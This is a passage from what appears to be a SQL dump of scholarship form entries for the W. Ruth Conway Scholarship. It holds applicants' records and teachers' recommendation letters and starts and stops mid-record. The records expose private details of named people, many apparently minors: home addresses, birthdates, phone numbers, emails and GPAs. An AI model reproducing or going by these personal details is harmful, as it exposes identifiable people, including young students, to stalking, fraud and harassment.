Engineering'),(1581,177,6,12,'NA'),(1582,177,6,14,'- Alpha Achievers (4 years)\r\n- National Honor Society (2 years)\r\n- Lightning Leaders (3 years)'),(1583,177,6,13,'- Honor Roll (2014 - present)\r\n- African American Festival of Academic Excellence (2014)\r\n- Acceptance into the National Honor Society (2016)\r\n- Star Scholarship winner (2017)'),(1584,177,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Community-Service-Scholarship-essay.docx'),(1585,177,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Copy-of-transcripts.pdf'),(1586,177,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/schol-release.docx'),(1587,178,8,1.3,'Kelvin'),(1588,178,8,1.6,'Baptist'),(1589,178,8,11,'Church of the Redeemer'),(1590,178,8,12,'Connect Ministry Lead'),(1591,178,8,2,'kbaptist@church-redeemer.org'),(1592,178,8,3,'Malik bowman'),(1593,178,8,4,'13 years'),(1594,178,8,5,'Administrator'),(1595,178,8,7,'Excellent'),(1596,178,8,9,'Excellent'),(1597,178,8,8,'Excellent'),(1598,178,8,14,'Malik serves on the Outside Connect Team at Church of the Redeemer in a volunteer capacity. Malik assists in the setting up of the parking lot by placing traffic cones and other traffic control devices around the multiple campus parking lots.  Also Malik serves on the Golf Cart team by operating a golf cart to transport our senior and special need guests to our building entrances.  Sometimes, he even directs traffic.\r\n\r\n \r\n\r\nMalik has served in these volunteer positions with outstanding service. He has a good demeanor and serves well other volunteers and staff members. He goes beyond the scope of his responsibilities and always willing to help others.  I highly recommend him for the W. Ruth Conway Scholarship.'),(1599,178,8,16,'Highly recommended'),(1600,179,8,1.3,'Amanda'),(1601,179,8,1.6,'Bouvier'),(1602,179,8,11,'Oakland Mills High School'),(1603,179,8,12,'Teacher'),(1604,179,8,2,'amanda_bouvier@hcpss.org'),(1605,179,8,3,'Ashara Wilson'),(1606,179,8,4,'2 years'),(1607,179,8,5,'Teacher/Professor'),(1608,179,8,7,'Excellent'),(1609,179,8,9,'Excellent'),(1610,179,8,8,'Excellent'),(1611,179,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Ashara-Wilson.pdf'),(1612,179,8,16,'Highly recommended'),(1613,180,8,1.3,'Yvonne'),(1614,180,8,1.6,'Rogers'),(1615,180,8,11,'Atholton High School'),(1616,180,8,12,'School Counselor'),(1617,180,8,2,'yvonne_rogers@hcpss.org'),(1618,180,8,3,'Catherine Volcy'),(1619,180,8,4,'One  year'),(1620,180,8,5,'Teacher/Professor'),(1621,180,8,7,'Excellent'),(1622,180,8,9,'Excellent'),(1623,180,8,8,'Excellent'),(1624,180,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/AHS-18-Recommendation-Catherine-Volcy.pdf'),(1625,180,8,16,'Highly recommended'),(1626,181,8,1.3,'Samantha'),(1627,181,8,1.6,'Filipiak'),(1628,181,8,11,'Hammond High School'),(1629,181,8,12,'English teacher'),(1630,181,8,2,'samantha_filipiak@hcpss.org'),(1631,181,8,3,'Jenaye Brooks Rivers'),(1632,181,8,4,'4 years'),(1633,181,8,5,'Teacher/Professor'),(1634,181,8,7,'Excellent'),(1635,181,8,9,'Excellent'),(1636,181,8,8,'Excellent'),(1637,181,8,14,'Please see attached letter.'),(1638,181,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Brooks-Rivers_Jenaye_SchRecomm_RuthConway.docx'),(1639,181,8,16,'Highly recommended'),(1640,182,6,18.3,'Lauryn'),(1641,182,6,18.6,'Williams'),(1642,182,6,19.1,'6120 Karas Walk'),(1643,182,6,19.3,'Elkridge'),(1644,182,6,19.4,'MD'),(1645,182,6,19.5,'21075'),(1646,182,6,19.6,'United States'),(1647,182,6,4,'06/15/2000'),(1648,182,6,21,'pirvinewilliams@hotmail.com'),(1649,182,6,20,'(443) 825-7002'),(1650,182,6,10,'Long Reach High School'),(1651,182,6,27,'BSAP Advisor'),(1652,182,6,28,'N/A'),(1653,182,6,9,'3.62'),(1655,182,6,26,'Biology/Pre-med'),(1656,182,6,12,'NA'),(1657,182,6,14,'Delta Scholars, 2 years\r\nYouth Volunteer at Celebration Church, 2 years'),(1658,182,6,13,'Dance Award 2015\r\nHealth Award 2015\r\nScience Award 2017\r\nEnglish Award 2017\r\nHonor Roll (Principal Gold and Silver) 2015 - 2018'),(1659,182,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Lauryn-Williams-Essay.docx'),(1660,182,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Transcript.pdf'),(1661,182,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Photo-Release-Form1.pdf'),(1662,183,8,1.3,'Shavon'),(1663,183,8,1.6,'McCown'),(1664,183,8,11,'Long Reach High School'),(1665,183,8,12,'Spanish Teacher'),(1666,183,8,2,'shavon_mccown@hcpss.org'),(1667,183,8,3,'Lauryn Williams'),(1668,183,8,4,'2 years'),(1669,183,8,5,'Teacher/Professor'),(1670,183,8,7,'Excellent'),(1671,183,8,9,'Excellent'),(1672,183,8,8,'Excellent'),(1673,183,8,14,'Please see attached recommendation letter.'),(1674,183,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Letter-of-Reference.pdf'),(1675,183,8,16,'Highly recommended'),(1676,184,8,1.3,'John'),(1677,184,8,1.6,'Street'),(1678,184,8,11,'Celebration Church'),(1679,184,8,12,'Director of Children\'s Ministry'),(1680,184,8,2,'jstreet7@verizon.net'),(1681,184,8,3,'Lauryn Williams'),(1682,184,8,4,'10 years'),(1683,184,8,5,'Other'),(1684,184,8,6,'She volunteered in the Children\'s Ministry in which I\'m the Director of this ministry'),(1685,184,8,7,'Excellent'),(1686,184,8,9,'Excellent'),(1687,184,8,8,'Excellent'),(1688,184,8,14,'See attached letter.'),(1689,184,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Letter-of-Reference-2.pdf'),(1690,184,8,16,'Highly recommended'),(1691,185,6,18.3,'Ashara'),(1692,185,6,18.6,'Wilson'),(1693,185,6,19.1,'7532 Ivybrook Lane'),(1694,185,6,19.3,'Glen Burnie'),(1695,185,6,19.4,'Maryland'),(1696,185,6,19.5,'21060'),(1697,185,6,19.6,'United States'),(1698,185,6,4,'12-16-1999'),(1699,185,6,21,'adeew99@gmail.com'),(1700,185,6,20,'(443) 374-8284'),(1701,185,6,10,'Oakland Mills High School'),(1702,185,6,27,'Friend/Family Member'),(1703,185,6,28,'N/A'),(1704,185,6,9,'4.0'),(1706,185,6,26,'Arts, Technology, and the Business of Innovation'),(1707,185,6,12,'N/A'),(1708,185,6,14,'2015 to 2018, Delta Scholars, President\r\n2016 to 2018, National Honors Society, Member\r\n2017 to 2018, Environmental Club, Communications Liaison\r\n2015 to 2017, Black Student Union, Executive Board Member'),(1709,185,6,13,'2018, Principal\'s Honor Roll\r\n2017, AP Scholar with Honors\r\n2017, Principal\'s Honor Roll\r\n2017, Gold Honor Roll\r\n2016, Gold Honor Roll\r\n2015, Gold Honor Roll\r\n2015, Student Athlete\r\n2015, Student of the Month\r\n2014, Gold Honor Roll'),(1710,185,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Scholarship-Essay.docx'),(1711,185,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Transcript1.pdf'),(1712,185,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Release-Form.pdf'),(1713,186,6,18.3,'Ayaba'),(1714,186,6,18.6,'Mercy'),(1715,186,6,19.1,'5361 Columbia Rd. Apt D'),(1716,186,6,19.3,'Clumbia'),(1717,186,6,19.4,'Maryland'),(1718,186,6,19.5,'21044'),(1719,186,6,19.6,'United States'),(1720,186,6,4,'12-21-1981'),(1721,186,6,21,'mercy.ayaba@howardcc.edu'),(1722,186,6,20,'(240) 413-9591'),(1723,186,6,10,'Howard Community College'),(1724,186,6,27,'School Counselor/Advisor'),(1725,186,6,28,'N/A'),(1726,186,6,9,'3.373'),(1728,186,6,26,'Nursing'),(1729,186,6,12,'59.00'),(1730,186,6,14,'I\'m a member carrier link academic club from October 2017 till present date.'),(1731,186,6,13,'Dean\'s List  in Fall 2014'),(1732,186,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Mercy-Ayaba_scholarship-application-essay-2.docx'),(1733,186,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Ayaba_Mercy_unofficial-Transcript.pdf'),(1734,186,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/LGZScholarshipReleaseForm.pdf'),(1735,187,8,1.3,'Kimberly'),(1736,187,8,1.6,'Odoms-Bolden'),(1737,187,8,11,'Department of Defense'),(1738,187,8,12,'Manager'),(1739,187,8,2,'kimodomsbolden@yahoo.com'),(1740,187,8,3,'Catherine'),(1741,187,8,4,'13'),(1742,187,8,5,'Advisor/Counselor'),(1743,187,8,7,'Excellent'),(1744,187,8,9,'Excellent'),(1745,187,8,8,'Excellent'),(1746,187,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Catherine-Volcy-Final-Letter-of-Rec-Word.docx'),(1747,187,8,16,'Highly recommended'),(1748,188,8,1.3,'Maureen'),(1749,188,8,1.6,'Marshall'),(1750,188,8,11,'Howard community College'),(1751,188,8,12,'Associate Director, Career Links'),(1752,188,8,2,'mmarshall@howardcc.edu'),(1753,188,8,3,'Mercy Ayaba'),(1754,188,8,4,'7 months'),(1755,188,8,5,'Advisor/Counselor'),(1756,188,8,7,'Excellent'),(1757,188,8,9,'Excellent'),(1758,188,8,8,'Average'),(1759,188,8,14,'Mercy is truly exceptional.  She has two young children, works and is enrolled in the rigorous nursing program at Howard Community College.  She had a high GPA at 3.5 for any student but especially one who is juggling so many roles as head of household, worker, parent and student.  She devotes her full energy to all of her roles and I know she will be an excellent, caring nurse.  I am so grateful to be able to support Mercy in any small way because she is so hard working.  She is independent, driven and offers support to her peers as well.  She is an outstanding student as evident by her GPA.  She is working hard to pursue her academic and career goals.  She is nothing short of a phenomenal woman.'),(1760,188,8,16,'Highly recommended'),(1761,189,6,18.3,'Chelsea'),(1762,189,6,18.6,'Ofori'),(1763,189,6,19.1,'3349 N Chatham Rd , Apt H'),(1764,189,6,19.3,'Ellicott City'),(1765,189,6,19.4,'MD'),(1766,189,6,19.5,'21042'),(1767,189,6,19.6,'United States'),(1768,189,6,4,'08/21/2000'),(1769,189,6,21,'chelsea.ofori33@gmail.com'),(1770,189,6,20,'(443) 572-1138'),(1771,189,6,10,'Centennial High School'),(1772,189,6,27,'Social Media'),(1773,189,6,28,'NA'),(1774,189,6,9,'3.35'),(1776,189,6,26,'Nursing'),(1777,189,6,12,'NA'),(1778,189,6,14,'I am a current member of Delta Scholars.I have been a member of this club for just a year.'),(1779,189,6,13,'Gold honour roll (2018 and 2017)\r\nPrincipals honour roll (2017)\r\nsilver honour roll (2017)'),(1780,189,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Scholarship-essay.docx'),(1781,189,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Chelsea-Ofori-transcript-2.pdf'),(1782,189,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Scan_0005.pdf'),(1783,190,8,1.3,'Peter'),(1784,190,8,1.6,'Foy'),(1785,190,8,11,'Oakland Mills High School'),(1786,190,8,12,'English Teacher'),(1787,190,8,2,'pfoy@hcpss.org'),(1788,190,8,3,'Ashara Wilson'),(1789,190,8,4,'2+ years'),(1790,190,8,5,'Teacher/Professor'),(1791,190,8,7,'Excellent'),(1792,190,8,9,'Excellent'),(1793,190,8,8,'Excellent'),(1794,190,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Ashara-Wilson1.pdf'),(1795,190,8,16,'Highly recommended'),(1796,191,8,1.3,'Meg'),(1797,191,8,1.6,'Ignacio'),(1798,191,8,11,'Leadership Howard County'),(1799,191,8,12,'Director, Youth Programs'),(1800,191,8,2,'mignacio@leadershiphc.org'),(1801,191,8,3,'Nina Bundy'),(1802,191,8,4,'2 years'),(1803,191,8,5,'Other'),(1804,191,8,6,'I run Leadership U - high school leadership program - Nina graduated in 2016 and also worked the past year as a member of our steering committee'),(1805,191,8,7,'Excellent'),(1806,191,8,9,'Excellent'),(1807,191,8,8,'Excellent'),(1808,191,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Nina-Bundy-W.-Ruth-Conway-Scholarship.docx'),(1809,191,8,16,'Highly recommended'),(1810,192,8,1.3,'Annette'),(1811,192,8,1.6,'Olney'),(1812,192,8,11,'Reservoir High School/Howard County Public School System'),(1813,192,8,12,'Black Student Achievement Program (BSAP) Achievement Liaison'),(1814,192,8,2,'annette_olney@hcpss.org'),(1815,192,8,3,'Summer Williams'),(1816,192,8,4,'I have known Summer Williams for almost 4 years.'),(1817,192,8,5,'Other'),(1818,192,8,6,'I am the former advisor for the Black Student Union (BSU) of Oakland Mills High School.'),(1819,192,8,7,'Excellent'),(1820,192,8,9,'Excellent'),(1821,192,8,8,'Excellent'),(1822,192,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Summer-Williams-Rec-W-Ruth-Conway-Zeta-Phi-Beta-Sorority-Inc.-Scholarship-2017-2018.pdf'),(1823,192,8,16,'Highly recommended'),(1824,193,8,1.3,'Emily'),(1825,193,8,1.6,'Dalton'),(1826,193,8,11,'Atholton High School'),(1827,193,8,12,'Teacher'),(1828,193,8,2,'emily_dalton@hcpss.org'),(1829,193,8,3,'Iejoma Okoro'),(1830,193,8,4,'Sept 2017'),(1831,193,8,5,'Teacher/Professor'),(1832,193,8,7,'Excellent'),(1833,193,8,9,'Excellent'),(1834,193,8,8,'Excellent'),(1835,193,8,14,'Date: 28 March, 2018\r\n\r\n\r\nTo Whom It May Concern:\r\n\r\n	This letter is in support of Iejoma Okoro, who is applying for the W. Ruth Conway Scholarship. I have known Iejoma this year as a student in my English 12 Honors class. I firmly believe that Iejoma embodies all aspects that the scholarship represents.\r\n\r\nIn the classroom, Iejoma is a dedicated, reliable, and thoughtful student. Iejoma has demonstrated time and again her capability to connect with the literature being studied. Her confidence and innate ability to engage in discourse with his peers gives Iejoma the ability to excel in classroom discussions as well as presentations. Her writing strikes an effective balance between creative and well supported; she is able to use her voice to make her points while maintaining the reader’s interest.\r\n\r\nIejoma’s reliability is characteristic that makes her an asset in the classroom. She can be counted on to maintain a consistent performance level and support her fellow classmates when the need arises.\r\nAdd to all of this that Iejoma is very personable, well liked by teachers and fellow-students alike, and it is understandable why she has my endorsement for her scholarship candidacy. \r\n\r\nPlease do not hesitate to contact me for additional information.\r\n\r\n\r\nSincerely,\r\nEmily Dalton\r\nEnglish Teacher'),(1836,193,8,16,'Highly recommended'),(1837,194,8,1.3,'Emily'),(1838,194,8,1.6,'Dalton'),(1839,194,8,11,'Atholton High School'),(1840,194,8,12,'Teacher'),(1841,194,8,2,'emily_dalton@hcpss.org'),(1842,194,8,3,'Ijeoma Okoro'),(1843,194,8,4,'Sept 2017'),(1844,194,8,5,'Teacher/Professor'),(1845,194,8,7,'Excellent'),(1846,194,8,9,'Excellent'),(1847,194,8,8,'Excellent'),(1848,194,8,14,'Date: 28 March, 2018\r\n\r\n\r\nTo Whom It May Concern:\r\n\r\n	This letter is in support of Ijeoma Okoro, who is applying for the W. Ruth Conway Scholarship. I have known Ijeoma this year as a student in my English 12 Honors class. I firmly believe that Ijeoma embodies all aspects that the scholarship represents.\r\n\r\nIn the classroom, Ijeoma is a dedicated, reliable, and thoughtful student. Ijeoma has demonstrated time and again her capability to connect with the literature being studied. Her confidence and innate ability to engage in discourse with his peers gives Ijeoma the ability to excel in classroom discussions as well as presentations. Her writing strikes an effective balance between creative and well supported; she is able to use her voice to make her points while maintaining the reader’s interest.\r\n\r\nIjeoma’s reliability is characteristic that makes her an asset in the classroom. She can be counted on to maintain a consistent performance level and support her fellow classmates when the need arises.\r\nAdd to all of this that Ijeoma is very personable, well liked by teachers and fellow-students alike, and it is understandable why she has my endorsement for her scholarship candidacy. \r\n\r\nPlease do not hesitate to contact me for additional information.\r\n\r\n\r\nSincerely,\r\nEmily Dalton\r\nEnglish Teacher'),(1849,194,8,16,'Highly recommended'),(1850,195,8,1.3,'Lisa'),(1851,195,8,1.6,'Clearfield'),(1852,195,8,11,'Atholton High School'),(1853,195,8,12,'School Counselor'),(1854,195,8,2,'Lisa_Clearfield@hcpss.org'),(1855,195,8,3,'Bailey Roberts'),(1856,195,8,4,'4 years'),(1857,195,8,5,'Advisor/Counselor'),(1858,195,8,7,'Excellent'),(1859,195,8,9,'Average'),(1860,195,8,8,'Excellent'),(1861,195,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Roberts-Bailey-2.pdf'),(1862,195,8,16,'Highly recommended'),(1863,196,8,1.3,'Helen'),(1864,196,8,1.6,'Newman'),(1865,196,8,11,'Zeta Phi Beta Sorority, Inc. Lambda Gamma Zeta'),(1866,196,8,12,'Youth Auxiliary Co-Chair'),(1867,196,8,2,'lovejoye1122@gmail.com'),(1868,196,8,3,'Jenaye Brooks-River'),(1869,196,8,4,'4'),(1870,196,8,5,'Other'),(1871,196,8,6,'Family friend/mentor'),(1872,196,8,7,'Excellent'),(1873,196,8,9,'Excellent'),(1874,196,8,8,'Excellent'),(1875,196,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Jenayes-letter.docx'),(1876,196,8,16,'Highly recommended'),(1877,197,8,1.3,'Anthone'),(1878,197,8,1.6,'Bond'),(1879,197,8,11,'Long Reach High School (Howard County Public Schools)'),(1880,197,8,12,'Teacher'),(1881,197,8,2,'anthone_bond@hcpss.org'),(1882,197,8,3,'Malik Bowman'),(1883,197,8,4,'Three years and six months'),(1884,197,8,5,'Teacher/Professor'),(1885,197,8,7,'Excellent'),(1886,197,8,9,'Excellent'),(1887,197,8,8,'Excellent'),(1888,197,8,14,'To Whom It May Concern:\r\n\r\nMalik Bowman is an extraordinary young man. My interactions with Malik have included having him as a student in my United States History class during his Freshman year.  I also serve as the faculty advisor for the Alpha Achievers Program here at Long Reach High School, which is a program that works to promote community service and academic excellence among African American males. From all of my dealings with Malik, I can frankly state that he possesses more potential than any one that I have ever come across. He will both excel at any college or university and add to the quality of the environment for all around him, with your financial support. \r\n\r\nAs his instructor in United States History, I have seen many examples of his talents and have long been impressed by his intelligence, work ethic, and creativity. What first struck me about him was him ability to think critically and always provide extended analysis of our topics.  His participation was truly an asset to the class and helped stimulate rich and insightful dialogue. While Malik’s academic record speaks for itself. I have always been impressed with his willingness to help others, his ability to think through an issue going beyond the arguments presented in the text, and the clarity of his exposition when introducing new ideas to the class or discussion. \r\n\r\nAs the faculty advisor for the Alpha Achievers organization, I have witnessed Malik’s outstanding organizational skills, his ability to work with others, and the respect that he gives and receives from his peers. Malik is able to successfully complete multiple tasks with favorable results despite deadline pressures.  He has assisted in numerous mentoring programs, such as Saturday Math Camp and our work with the young men of Ducketts Lane Elementary. One of the public service projects undertaken by the Achievers involved a large scale clothing drive in which Malik helped to gather, organize, and deliver clothing to over 500 families throughout Howard County, MD.  In addition to Alpha Achievers, Malik has also been a Lightning Leader here at Long Reach and maintained a part time job at Mission Barbecue. \r\n\r\nIf your program is seeking superior candidates with a record of achievement, Malik is the best possible choice. He has consistently demonstrated an ability to rise to any challenge that he must face. \r\n\r\nTo conclude, I would like to restate my strongest possible recommendation to your scholarship committee for Malik Bowman.  I am certain beyond a doubt he will make our country proud and become a leader in the future.  If you have any further questions regarding Malik\'s ability or this recommendation, please do not hesitate to contact me using the information on this letterhead. \r\n\r\nSincerely, \r\n\r\nAnthone Bond \r\n\r\nAnthone Bond\r\nAnthone_bond@hcpss.org'),(1889,197,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/malik-bowman.docx'),(1890,197,8,16,'Highly recommended'),(1891,198,8,1.3,'Thelma'),(1892,198,8,1.6,'Hayes'),(1893,198,8,11,'Hayes Educational Resources Enterprises, LLC'),(1894,198,8,12,'Director'),(1895,198,8,2,'thelma_hayes@msn.com'),(1896,198,8,3,'Summer Williams'),(1897,198,8,4,'11 years'),(1898,198,8,5,'Other'),(1899,198,8,6,'Mentor/ Tutor /Advisor'),(1900,198,8,7,'Excellent'),(1901,198,8,9,'Excellent'),(1902,198,8,8,'Excellent'),(1903,198,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/W_Ruth_Conway_-Letter-for-_-Summer_LaMae_-Williams1.pdf'),(1904,198,8,16,'Highly recommended'),(1905,199,8,1.3,'Nya-nyo'),(1906,199,8,1.6,'Nfi'),(1907,199,8,11,'Howard Community college'),(1908,199,8,12,'Nursing Instructor'),(1909,199,8,2,'nnfi@howardcc.edu'),(1910,199,8,3,'Ayaba, Mercy'),(1911,199,8,4,'1year'),(1912,199,8,5,'Teacher/Professor'),(1913,199,8,7,'Excellent'),(1914,199,8,9,'Excellent'),(1915,199,8,8,'Average'),(1916,199,8,14,'Please see attachment for Letter of recommendation.In case the letter failed to attach below is what is written in the letter.\r\n\r\nMarch 29th, 2018\r\n\r\n\r\nRE: Letter of Recommendation Mercy, Ayaba;\r\nI had the opportunity and enjoyed sharing my knowledge with  Mercy, Ayaba as her Nursing Instructor for fundamentals of Nursing. It was an absolute joy to work with Ms. Ayaba.  She attended all Lecture sessions and was prepared for lecture. Ms. Herd interacted professionally with faculty, and peers.   Ms. Ayaba, took interest in learning and getting clinical experience by asking questions. \r\nMs. Ayaba  is knowledgeable and applied it with confidence. She utilized therapeutic communication skills during interaction with faculty and classmates.\r\nI am very proud that Ms. Ayaba needing assistance to complete the Nursing Program  applied for the Ruth Conway Scholarship. Her interest in learning will make her an astute Nurse. Please the need for nurses is ever growing please give Ms. Ayaba the opportunity to further her education and complete the nursing program by giving her this scholarship. Ms. Ayaba will be will be an asset to the Nursing Profession.\r\n\r\nShould you need additional information  please feel free to contact me.\r\nSincerely,\r\n\r\nNya-nyo Nfi, MSN,BSN,RN\r\nProfessor of Nursing\r\nHoward Community College\r\n10901 Little Patuxent Parkway\r\nColumbia MD 21044\r\nnnfi@howardcc.edu\r\n443-518-4894 (Work)\r\n443-622-4662(Cell)'),(1917,199,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/scholarshipLetter-of-reccomadationFebruary-14th-2018.docx'),(1918,199,8,16,'Highly recommended'),(1919,200,8,1.3,'Brooke'),(1920,200,8,1.6,'Schneider'),(1921,200,8,11,'Long Reach High School'),(1922,200,8,12,'English Teacher, Yearbook Adviser, National Honor Society Sponsor'),(1923,200,8,2,'Brooke_Schneider@hcpss.org'),(1924,200,8,3,'Maya Smithson'),(1925,200,8,4,'4 years'),(1926,200,8,5,'Teacher/Professor'),(1927,200,8,7,'Excellent'),(1928,200,8,9,'Excellent'),(1929,200,8,8,'Excellent'),(1930,200,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/MayaSmithson.docx'),(1931,200,8,16,'Highly recommended'),(1932,201,8,1.3,'Melody'),(1933,201,8,1.6,'Green-Lewis'),(1934,201,8,11,'Howard High School'),(1935,201,8,12,'School Counselor'),(1936,201,8,2,'melody_green-lewis@hcpss.org'),(1937,201,8,3,'Ellis Finney-Wright'),(1938,201,8,4,'One year'),(1939,201,8,5,'Advisor/Counselor'),(1940,201,8,6,'The Recommendation was written by his former counselor.'),(1941,201,8,7,'Excellent'),(1942,201,8,9,'Excellent'),(1943,201,8,8,'Excellent'),(1944,201,8,14,'The  Recommendation  that is uploaded was written by his prior counselor  Ms. Nicola Hildreth for all of his letter of recommendations for college per the student\'s request.'),(1945,201,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/written-evaluation-finney-wright-ellis.pdf'),(1946,201,8,16,'Highly recommended'),(1947,202,6,18.3,'Oluwaseun'),(1948,202,6,18.6,'Showunmi'),(1949,202,6,19.1,'5222 Hayledge ct'),(1950,202,6,19.3,'Columbia'),(1951,202,6,19.4,'MD'),(1952,202,6,19.5,'21045'),(1953,202,6,19.6,'United States'),(1954,202,6,4,'08-15-00'),(1955,202,6,21,'missyshay21@gmail.com'),(1956,202,6,20,'(443) 538-7838'),(1957,202,6,10,'Oakland Mills High School'),(1958,202,6,27,'School Counselor/Advisor'),(1959,202,6,28,'N/A'),(1960,202,6,9,'3.6'),(1962,202,6,26,'Nursing'),(1963,202,6,12,'22'),(1964,202,6,14,'Delta Scholars Membership-Member from 2015-2018\r\nSchool Volleyball Team Membership- Setter from 2014-2017\r\nClub Volleyball Team Membership- Setter from 2014-2017\r\nEarly College Program Student- Student from 2015-2018'),(1965,202,6,13,'Academic Athlete Award-2014\r\nHonor Roll 2014-2018\r\nThe celebration of Excellence Award-2018\r\nDelta Scholars nomination 2015-2017\r\nNational Honors Society nomination 2016-2017\r\nNational Society of High School Scholars invitation'),(1966,202,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Ruth-Conway-scholarship-1.docx'),(1967,202,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/HoCo-Transcripts.pdf'),(1968,202,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/ruth-conway-release-form.pdf'),(1969,203,8,1.3,'Alexandra'),(1970,203,8,1.6,'Harryman'),(1971,203,8,11,'Long Reach High School'),(1972,203,8,12,'Teacher'),(1973,203,8,2,'alexandra_harryman@hcpss.org'),(1974,203,8,3,'Maya Smithson'),(1975,203,8,4,'2 Years'),(1976,203,8,5,'Teacher/Professor'),(1977,203,8,7,'Excellent'),(1978,203,8,9,'Excellent'),(1979,203,8,8,'Excellent'),(1980,203,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/SmithsonRec.pdf'),(1981,203,8,16,'Highly recommended'),(1982,204,6,18.3,'Maya'),(1983,204,6,18.6,'Smithson'),(1984,204,6,19.1,'8309 Stairtop Court'),(1985,204,6,19.3,'Columbia'),(1986,204,6,19.4,'MD'),(1987,204,6,19.5,'21045'),(1988,204,6,19.6,'United States'),(1989,204,6,4,'12-02-00'),(1990,204,6,21,'m.designs2319@gmail.com'),(1991,204,6,20,'(410) 300-3240'),(1992,204,6,10,'Long Reach High School'),(1993,204,6,27,'Other'),(1994,204,6,28,'Searching Online'),(1995,204,6,9,'3.24'),(1997,204,6,26,'Fine Arts and Business'),(1998,204,6,12,'N/A'),(1999,204,6,14,'Long Reach High School J.V. Cheer (2014-2015)\r\nLong Reach High School Varsity Cheer (2015-2018)\r\nLong Reach High School Track and Field (2014-2018)\r\nDelta Scholars (2015-2018)\r\nSpanish National Honor Society (2016-2018)\r\nNational Honor Society (2017-2018)'),(2000,204,6,13,'S.T.A.R. Scholarship (2017)\r\nHoward County Council of Elders Senior Award (2018)'),(2001,204,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/M.Smithson.Transcript.pdf'),(2002,204,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/M.SmithsonPhotoRelease.pdf'),(2003,204,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Maya-Smithson-Ruth-W.-Conway-Scholarship-Essay.docx'),(2004,205,8,1.3,'Catherine'),(2005,205,8,1.6,'Kriner'),(2006,205,8,11,'Atholton High School'),(2007,205,8,12,'Teacher'),(2008,205,8,2,'catherine_kriner@hcpss.org'),(2009,205,8,3,'Adjoa Armoo'),(2010,205,8,4,'1 yr'),(2011,205,8,5,'Teacher/Professor'),(2012,205,8,6,'She is my student aide.'),(2013,205,8,7,'Excellent'),(2014,205,8,9,'Excellent'),(2015,205,8,8,'Excellent'),(2016,205,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/AdjoaArmoo-PDF.pdf'),(2017,205,8,16,'Highly 